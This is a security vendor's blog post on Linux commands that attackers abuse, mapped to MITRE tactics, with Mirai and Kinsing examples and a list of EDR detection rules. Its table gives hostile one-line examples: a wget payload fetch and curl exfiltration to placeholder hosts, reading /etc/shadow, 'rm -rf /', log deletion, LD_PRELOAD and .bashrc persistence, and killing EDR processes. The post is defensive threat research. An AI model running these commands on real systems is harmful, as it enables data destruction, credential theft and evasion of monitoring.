Skip to content
Try it Free Request Your Demo
    May 7, 2021

    Linux Commands and Utilities Commonly Used by Attackers

    Uptycs' threat research team has observed several instances of Linux malware where the attackers leverage the inbuilt commands and utilities for a wide range of malicious activities.
    In this post, we’ll take a look at the Linux commands and utilities commonly used by attackers and how you can use Uptycs EDR detection capabilities to find if these have been used in your environment.

    Background

    In Linux, several utilities and commands are configured by default. Once an adversary gains access to the system, they can leverage these commands and utilities to get their malware up and loaded quickly with full system privileges. And since these commands and utilities are used by users on a daily basis, it can be extremely difficult to detect malicious activities if they have been used for malicious purposes.
    Using the data sources from customer telemetry, MITRE mapping of the detection alerts, threat intelligence systems and our in-house osquery-based sandbox, we identified around 25 commands and utilities that are most commonly used by attackers.

    Uptycs EDR has detected and identified malware abusing these commands and utilities using the following MITRE tactics:

    1. Command and Control
    2. Persistence
    3. Privilege Escalation
    4. Defense Evasion
    5. Discovery

    We drill down and take a closer look at a few examples in the table below.

    Linux commands and utilities used by attackers

    Using Uptycs EDR, we discovered the Linux commands most commonly used by attackers and mapped them to the techniques and tactics used by bad actors. Below is a list of commonly exploited commands and utilities.

    Command / Utility

    Techniques

    Tactics

    Example

    arp

    Remote System Discovery

    Discovery

    arp -a

    users

    System Owner/User Discovery

    Discovery

    users

    netstat

    System Network Connections Discovery Linux

    Discovery

    netstat -plntu

    uname

    List OS Information

    Discovery

    uname -a

    groups

    Enumerate users and groups

    Discovery

    groups

    tcpdump

    Packet Capture Linux

    Discovery

    tcpdump -n > output

    LD_PRELOAD=#{path_to_shared_library} ls

    Shared Library Injection via LD_PRELOAD

    Persistence, Privilege Escalation, Defense Evasion

    LD_PRELOAD=”/tmp/wqs.so” /bin/ls

    insmod

    Loadable Kernel Module based Rootkit

    Persistence

    sudo insmod rootkit.ko

    modprobe

    Loadable Kernel Module based Rootkit

    Persistence

    sudo modprobe -r rootkit.ko

    useradd

    Create a user account on a Linux System

    Persistence

    useradd –g 500 –u 500 –s /usr/local/bin/nocando –d /var/spool/vmail

    crontab

    Schedule task/Job using cron

    Persistence

    crontab -

    rm

    Delete Filesystem - Linux

    Delete Log Files

    Impact

    rm -rf / --no-preserve-root

    rm -rf /var/logs

    kill/pkill

    Kill EDR processes

    Impact

    kill -9 1234

    lsmod

    Linux VM Check via Kernel Modules

    Defense evasion

    sudo lsmod | grep -i "vboxsf\|vboxguest"

    systemctl

    Stop edr services on Linux

    Defense evasion

    systemctl stop daemon

    curl

    Malicious User Agents

    Command and Control

    curl -XPOST #{base64_data}.#{destination_url}

    wget

    Ingress Tool Transfer

    Command and Control

    wget http://{IP}:1337/file.sh

    chattr

    File attributes/permissions modification

    Defense Evasion

    chattr -i /etc/ld.so.preload

    /etc/shadow

    Access /etc/shadow (Local)

    Persistence, Credential Access

    sudo cat /etc/shadow > file

    /etc/passwd

    Access /etc/passwd (Local)

    Enumerate all accounts

    Persistence

    cat /etc/passwd > file

    ~/.bash_history

    Clear Bash history

    Access Bash history

    Credential Access, Defense Evasion

    echo “” > ~/.bash_history

    /etc/sudoers

    View sudoers access

    Privilege Escalation

    vim /etc/sudoers

    ~/.bashrc

    .bash_profile and .bashrc

    Persistence

    echo “/tmp/qwer” >> ~/.bashrc

    ~/.bash_profile

    .bash_profile and .bashrc

    Persistence

    echo “/tmp/qwer” >> ~/.bash_profile

    /etc/ld.so.preload

    Hijack Execution Flow

    Persistence, Privilege Escalation, Defense Evasion

    echo “/tmp/a.so” >> /etc/ld.so.preload

    Table: Commonly exploited Linux commands/utilities

    Malware Tactics Using Linux Commands

    Here’s a closer look at some of the most recent and commonly seen malware using the above commands and utilities.

    Tactic: CnC and Execution

    Malware: Mirai

    Usage : Commands like wget and curl are most widely seen to download and execute other pieces of malware

    Mirai is a malware that turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks. In the attack kill chain, the adversary downloads the initial shell script on the target system which then executes wget and curl to drop the Mirai binaries for different architectures and executes them. (See Figure 1)

    Mirai malware executing wget and curl activities.Figure 1: Mirai malware executing wget and curl activities. (Click to see larger version.)

    Uptycs EDR detected the curl and wget activities performed by the malware and also the process activity of Mirai. (See Figure 2)

    Uptycs Detection for wget and curl activities by Mirai.Figure 2: Uptycs Detection for wget and curl activities by Mirai. (Click to see larger version.)

    Tactic: Persistence, Defense Evasion

    Malware: Kinsing

    Usage: For persistence and defence evasion mechanism, we have seen adversaries of Kinsing abusing commands like crontab, chattr, or rm and modifying files like ~/.bash_history, /etc/ld.so.preload.

    Kinsing is a malware that targets misconfigured Docker services and infects them to run crypto miners. The initial phase of the malware is to download and execute the shell script which then modifies /etc/ld.so.preload and also executes crontab for achieving persistence. (See Figure 3 and 4)

    Kinsing modifying /etc/ld.so.preload.Figure 3: Kinsing modifying /etc/ld.so.preload.

    Kinsing adding cron job for persistence. Figure 4: Kinsing adding cron job for persistence. 

    Uptycs EDR detected the Kinsing malware executing crontab and chattr commands for persistence and defense evasion. (See Figure 5)

    Uptycs Detection for Kinsing malware.Figure 5: Uptycs Detection for Kinsing malware. (Click to see larger version.)

    In addition to the linux commands and utilities used by Mirai and Kinsing, Uptycs EDR also labelled the threat using process scanning with 10/10 risk score.

    Tactic: Discovery

    Most Linux servers are used for hosting services mostly using SSH. If SSH is not configured properly, the adversaries may gain access into servers using various techniques like exploiting weak credentials. Once the adversaries get access to the target system, their initial goal is to extract system information for further stages like Exploitation, Privilege Escalation or Persistence. Commands like uname, users, groups, netstat, etc. are most commonly used for initial investigation.

    Uptycs EDR detects all the post activities after successful SSH login on our target system. (See Figure 6)

    Uptycs Detection for Discovery Techniques.Figure 6: Uptycs Detection for Discovery Techniques. (Click to see larger version.)

    Conclusion

    By exploiting Linux commands that are used for daily operations, it’s possible that their use for malicious activities are often left unnoticed and stay under the radar. Linux Enterprise administrators should regularly monitor the list of the most commonly used commands in the list above for any suspicious/malicious activities in the system. Current Uptycs customers can see a full list of Event Rules below.

    Not currently using Uptycs? Check out this short demo to learn a little more about how we can help solve your key Linux security challenges, 

    Watch A 15-Minute Demo!

     

    Event Rules for Uptycs Customers

    The following Uptycs EDR rules are already available to customers to detect above mentioned techniques:

    • Process using ifconfig, ip or arp to get the network configuration - T1016 Discovery under Discovery for Linux
    • Process using who or users utility to get users information - T1033 Discovery under Discovery for Linux
    • Suspicious tool tcpdump launched to capture network traffic - T1040 Discovery for Linux
    • Detected use of curl utility to download file from internet - T1105 Command and Control for Linux
    • Process using groups utility to get group policies - T1069.002 Discovery for Linux
    • Process or script trying to get system information - T1082 System Information Discovery under Discovery for Linux
    • Useradd utility launched to create user account - T1136 Persistence for Linux
    • Detected use of LD_PRELOAD - Likely code injection - T1574.006 Hijack Execution for Linux
    • Scheduled Task by Cron - T1053.003 Persistence_LINUX
    • Process trying to access /etc/ld.so.preload file for persistence - T1055.001 Defense Evasion for Linux
    • Suspicious use of wget to download file in tmp directory - T1105 Command and Control for Linux
    • Process trying to access or modify OS credentials - T1003.008 Credential Access Linux
    • Process trying to access bash history - T1552.003 Credential Access for Linux
      bash_profile or .bashrc file modification - T1156.004 Persistence for Linux
    • Process trying to access /etc/ld.so.preload file for persistence - T1055.001 Defense Evasion for Linux
    • Create or Modify Systemd Service- T1543.002 Persistence_LINUX
    • Data deletion using rm -rf detected - T1485 Impact for Linux
    • Process trying to access /etc/passwd file - T1087.001 Discovery for Linux
    • Process trying to access /etc/sudoers file - T1548.003 Privilege Escalation for Linux
    • Process using crontab utility to add entries in cron jobs - T1053.003 Execution for Linux

    Pritam Salunkhe

    Pritam Salunkhe works as Security Researcher at Uptycs. His expertise is in Malware Analysis and Reverse Engineering. He has a keen interest in programming and building tools for defensive purpose.

    Other posts you might be interested in